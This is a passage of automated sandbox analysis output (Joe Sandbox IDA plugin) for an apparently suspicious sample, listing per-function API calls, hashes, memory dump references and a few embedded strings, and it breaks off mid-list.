                                              • Opcode ID: 7099b0b56c452bcec7d5b3411595a68b47e00a0f691d87155797fa741438fb57
                                              • Instruction ID: bbd7e7dd6d1c964350496c28cedce179363536c727741c6e38e17094ecd2647a
                                              • Opcode Fuzzy Hash: 7099b0b56c452bcec7d5b3411595a68b47e00a0f691d87155797fa741438fb57
                                              • Instruction Fuzzy Hash: 34F12A71A00119EFDB04DFA4C888EAEB7B9FF49315F108059F926AF291CB71AD49CB51
                                              APIs
                                              • _memset.LIBCMT ref: 0015F9C9
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015FB5C
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0015FB80
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015FBC0
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0015FBE2
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015FD5E
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0015FD90
                                              • CloseHandle.KERNEL32(?), ref: 0015FDBF
                                              • CloseHandle.KERNEL32(?), ref: 0015FE36
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: c11734fc382d0ac36da68611b99c51f8fa8475da2d37e2acb33b3b3a460adc27
                                              • Instruction ID: a9f4b03b8ff8b755478685d3a706b36a012dd93886c41ef2497065da6af0aa78
                                              • Opcode Fuzzy Hash: c11734fc382d0ac36da68611b99c51f8fa8475da2d37e2acb33b3b3a460adc27
                                              • Instruction Fuzzy Hash: 10E1A031204341DFCB14EF24C895A6ABBE1BF84354F14896DF8A99F2A2DB71DC46CB52
                                              APIs
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001438D3,?), ref: 001448C7
                                                • Part of subcall function 001448AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001438D3,?), ref: 001448E0
                                                • Part of subcall function 00144CD3: GetFileAttributesW.KERNEL32(?,00143947), ref: 00144CD4
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00144FE2
                                              • _wcscmp.LIBCMT ref: 00144FFC
                                              • MoveFileW.KERNEL32(?,?), ref: 00145017
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: 558cc81bc20952fdae61e440a5fe113dd52ec74942ea7bf9f6ed389b32d8bdde
                                              • Instruction ID: cfbb495226f034d859bd566d6396176d1936bb75c22ff09c9fa56416e7f0331f
                                              • Opcode Fuzzy Hash: 558cc81bc20952fdae61e440a5fe113dd52ec74942ea7bf9f6ed389b32d8bdde
                                              • Instruction Fuzzy Hash: 885187B20087859BC724DB50DC819DFB3ECAF94341F14492EF199D31A2EF74A588C766
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00138A84,00000B00,?,?), ref: 00138E0C
                                              • HeapAlloc.KERNEL32(00000000,?,00138A84,00000B00,?,?), ref: 00138E13
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00138A84,00000B00,?,?), ref: 00138E28
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00138A84,00000B00,?,?), ref: 00138E30
                                              • DuplicateHandle.KERNEL32(00000000,?,00138A84,00000B00,?,?), ref: 00138E33
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00138A84,00000B00,?,?), ref: 00138E43
                                              • GetCurrentProcess.KERNEL32(00138A84,00000000,?,00138A84,00000B00,?,?), ref: 00138E4B
                                              • DuplicateHandle.KERNEL32(00000000,?,00138A84,00000B00,?,?), ref: 00138E4E
                                              • CreateThread.KERNEL32(00000000,00000000,00138E74,00000000,00000000,00000000), ref: 00138E68
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 1210bffef53295762dfc8761a9e898c2eb16526b3f49795f4a04f951b4cd7a2e
                                              • Instruction ID: 153c06610ebcfa6df51c79234a361cfd8395b992096be4ee121c0108deaf82f9
                                              • Opcode Fuzzy Hash: 1210bffef53295762dfc8761a9e898c2eb16526b3f49795f4a04f951b4cd7a2e
                                              • Instruction Fuzzy Hash: 5901BBB5240308FFE710ABA5EC4DF6B3BACEB89751F004425FA05DB5A1CAB19841CB20
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              • Opcode ID: 99eedd4c23c9ea69e69b3cc56be1c89953a7bc6b5ffcb9b7d80bde256aab8680
                                              • Instruction ID: 30bfa8c88cd0f1b7354c790bec5512ff5e9165eb1f5f28479ec54b54a5231e83
                                              • Opcode Fuzzy Hash: 99eedd4c23c9ea69e69b3cc56be1c89953a7bc6b5ffcb9b7d80bde256aab8680
                                              • Instruction Fuzzy Hash: 8A918C71A00215EFDF24DFA5C848FAEB7B8EF45711F10815AF925AB280D7709949CBA1
                                              APIs
                                                • Part of subcall function 00137652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?,?,0013799D), ref: 0013766F
                                                • Part of subcall function 00137652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 0013768A
                                                • Part of subcall function 00137652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?,?), ref: 00137698
                                                • Part of subcall function 00137652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0013758C,80070057,?), ref: 001376A8
                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00159B1B
                                              • _memset.LIBCMT ref: 00159B28
                                              • _memset.LIBCMT ref: 00159C6B
                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00159C97
                                              • CoTaskMemFree.OLE32(?), ref: 00159CA2
                                              Strings
                                              • NULL Pointer assignment, xrefs: 00159CF0
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                              • String ID: NULL Pointer assignment
                                              • API String ID: 1300414916-2785691316
                                              • Opcode ID: 17115ab0905219c26ff2dce679e9f1f4ef1ea11eef4f7f085f37ef7d672deb33
                                              • Instruction ID: 4c91dd4a8fb80eac2c84bde55989be1070bcfee870f67704988a4189806c43a8
                                              • Opcode Fuzzy Hash: 17115ab0905219c26ff2dce679e9f1f4ef1ea11eef4f7f085f37ef7d672deb33
                                              • Instruction Fuzzy Hash: BA913871D00219EFDF10DFA5DC80ADEBBB8AF08310F20416AF819AB281DB715A45CFA1
                                              APIs
                                                • Part of subcall function 00143E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00143EB6
                                                • Part of subcall function 00143E91: Process32FirstW.KERNEL32(00000000,?), ref: 00143EC4
                                                • Part of subcall function 00143E91: CloseHandle.KERNEL32(00000000), ref: 00143F8E
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015ECB8
                                              • GetLastError.KERNEL32 ref: 0015ECCB
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0015ECFA
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0015ED77
                                              • GetLastError.KERNEL32(00000000), ref: 0015ED82
                                              • CloseHandle.KERNEL32(00000000), ref: 0015EDB7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              • Opcode ID: 0cc37cd76ae56bb4fb94cd162770d7613d40635f18201c0c092bbc47bfceba32
                                              • Instruction ID: d68cfd581091f3d4125e57475c63a5eafbdfc9c200f5c50ed250fb8367beb984
                                              • Opcode Fuzzy Hash: 0cc37cd76ae56bb4fb94cd162770d7613d40635f18201c0c092bbc47bfceba32
                                              • Instruction Fuzzy Hash: 0641BE716002019FDB18EF24CC95FBDB7A5AF90710F08802CF9529F2D2DBB5A908CB92
                                              APIs
                                              • ShowWindow.USER32(001A67B0,00000000,00F154E0,?,?,001A67B0,?,0016B862,?,?), ref: 0016B9CC
                                              • EnableWindow.USER32(00000000,00000000), ref: 0016B9F0
                                              • ShowWindow.USER32(001A67B0,00000000,00F154E0,?,?,001A67B0,?,0016B862,?,?), ref: 0016BA50
                                              • ShowWindow.USER32(00000000,00000004,?,0016B862,?,?), ref: 0016BA62
                                              • EnableWindow.USER32(00000000,00000001), ref: 0016BA86
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0016BAA9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID: @U=u
                                              • API String ID: 642888154-2594219639
                                              • Opcode ID: 4cd72e3b0b01cd5d8ed4415642576b414791ac31d6ea2756a15c5299d4bac12e
                                              • Instruction ID: 9098de3d1a7f647e8826ddb9ff0df7af80718d117012e25aa37595687e77993f
                                              • Opcode Fuzzy Hash: 4cd72e3b0b01cd5d8ed4415642576b414791ac31d6ea2756a15c5299d4bac12e
                                              • Instruction Fuzzy Hash: 39417170608240AFDB25CF58DCC9B957BE1FF05315F1942B9EA48CF6A2C771A8A6CB50
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 001432C5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: 1338f5e57281ed73f9bf046505b3b46bf5fae8c81a3bb89dd850b9843d02705e
                                              • Instruction ID: a097b8f8e0ee9928387c40dd7d6110e1f0319fe6afaa822f869b40e1f6d23a7d
                                              • Opcode Fuzzy Hash: 1338f5e57281ed73f9bf046505b3b46bf5fae8c81a3bb89dd850b9843d02705e
                                              • Instruction Fuzzy Hash: 8011063124C346BBEB055B54EC43CAAB39CEF29370F20402AF920A61D1E7F56B4146F5
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0014454E
                                              • LoadStringW.USER32(00000000), ref: 00144555
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0014456B
                                              • LoadStringW.USER32(00000000), ref: 00144572
                                              • _wprintf.LIBCMT ref: 00144598
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001445B6
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00144593
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 02c3300441ebf12f297d92ce5908d1d8adc2d6c9a71aa3cf912b08ac89395d69
                                              • Instruction ID: 4e0e20dd19cd3ef93aaee9cc85844053d9dea3d6160431efb746b8008406b937
                                              • Opcode Fuzzy Hash: 02c3300441ebf12f297d92ce5908d1d8adc2d6c9a71aa3cf912b08ac89395d69
                                              • Instruction Fuzzy Hash: 62014FF290420CBFE710A7A4ED89EE6776CE708301F0005A9FB45E6051EBB49E868B70
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000), ref: 000E2ACF
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000,000000FF), ref: 000E2B17
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000), ref: 0011C46A
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0011C417,00000004,00000000,00000000,00000000), ref: 0011C4D6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 92241de3800c247f188de9c57be95dd09b6d343c0148c99f70096798617a8ce2
                                              • Instruction ID: 54b273511484e61b3036b307ef84f239774e76935d481532da1a88471e6a172a
                                              • Opcode Fuzzy Hash: 92241de3800c247f188de9c57be95dd09b6d343c0148c99f70096798617a8ce2
                                              • Instruction Fuzzy Hash: 89411B312087C09FC7798B2ADC987BB7BDAAB85310F1D843EE04766961C77598C2D752
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0014737F
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001473B6
                                              • EnterCriticalSection.KERNEL32(?), ref: 001473D2
                                              • _memmove.LIBCMT ref: 00147420
                                              • _memmove.LIBCMT ref: 0014743D
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0014744C
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00147461
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00147480
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: 774f5cba42ea92134c59d48aed4782b638448131c12247431b28b7d8490229ef
                                              • Instruction ID: 90e1a11f8fea4cb80794637bf818a53d40b79cf9d1400e9743959ddfe2fe5571
                                              • Opcode Fuzzy Hash: 774f5cba42ea92134c59d48aed4782b638448131c12247431b28b7d8490229ef
                                              • Instruction Fuzzy Hash: 6A319C32904205EBCF10DF64DC85AAEBBB8FF45710F1440A9F944AB29ADB70DA55DBA0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 5189b432aef946cefd11743493bb6299068e20de2a72b66a048241cdcbd0b039
                                              • Instruction ID: 7d3a52c76909a2d2e1619b114cae104d1a28dd4c717257bff158817e690f268b
                                              • Opcode Fuzzy Hash: 5189b432aef946cefd11743493bb6299068e20de2a72b66a048241cdcbd0b039
                                              • Instruction Fuzzy Hash: E721C975A00209F7D628A5218D52FBF33ACAF30394F084020FD09B62D2EBA6DD1297E5
                                              APIs
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                              • _wcstok.LIBCMT ref: 0014EEFF
                                              • _wcscpy.LIBCMT ref: 0014EF8E
                                              • _memset.LIBCMT ref: 0014EFC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: 0a0d15719c7654b7ee80a709f85321859c4fb03a0b6cafb23b228b409ae84de5
                                              • Instruction ID: 8cc31c073a12ec4a12e81efef1d04f00eb3477c9d4abfe5bb4edaae0a4eb5831
                                              • Opcode Fuzzy Hash: 0a0d15719c7654b7ee80a709f85321859c4fb03a0b6cafb23b228b409ae84de5
                                              • Instruction Fuzzy Hash: C7C17E715083419FD724EF24C885AAAB7E4FF84310F14492DF899AB3A2DB70ED45CB82
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00156F14
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00156F35
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00156F48
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00156FFE
                                              • inet_ntoa.WSOCK32(?), ref: 00156FBB
                                                • Part of subcall function 0013AE14: _strlen.LIBCMT ref: 0013AE1E
                                                • Part of subcall function 0013AE14: _memmove.LIBCMT ref: 0013AE40
                                              • _strlen.LIBCMT ref: 00157058
                                              • _memmove.LIBCMT ref: 001570C1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: eb5382d28a2b96e238976c6cd4e550d3a6e40c5960f1995a702659109d73150e
                                              • Instruction ID: cb17857d0a8f35289b917c9363d0d68b905d00638b234ab8eb1b91ea5e5b581e
                                              • Opcode Fuzzy Hash: eb5382d28a2b96e238976c6cd4e550d3a6e40c5960f1995a702659109d73150e
                                              • Instruction Fuzzy Hash: 7181DF71108300EFC714EB25DC82EABB3E8AF84714F54891CF965AB2D2DB709D09C792
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f79fa2902900075664b6a57dfa65156f6eaaa68c8fb2e76d4d3b8973375c4a61
                                              • Instruction ID: a31abadb11fe23803ceebad7cb192b66117495a9704c1e5f8015797982f83d28
                                              • Opcode Fuzzy Hash: f79fa2902900075664b6a57dfa65156f6eaaa68c8fb2e76d4d3b8973375c4a61
                                              • Instruction Fuzzy Hash: AA718D71904149EFCB14CF99CC88EFEBB79FF85314F148159F915AA291D730AA52CBA0
                                              APIs
                                              • _memset.LIBCMT ref: 0015F75C
                                              • _memset.LIBCMT ref: 0015F825
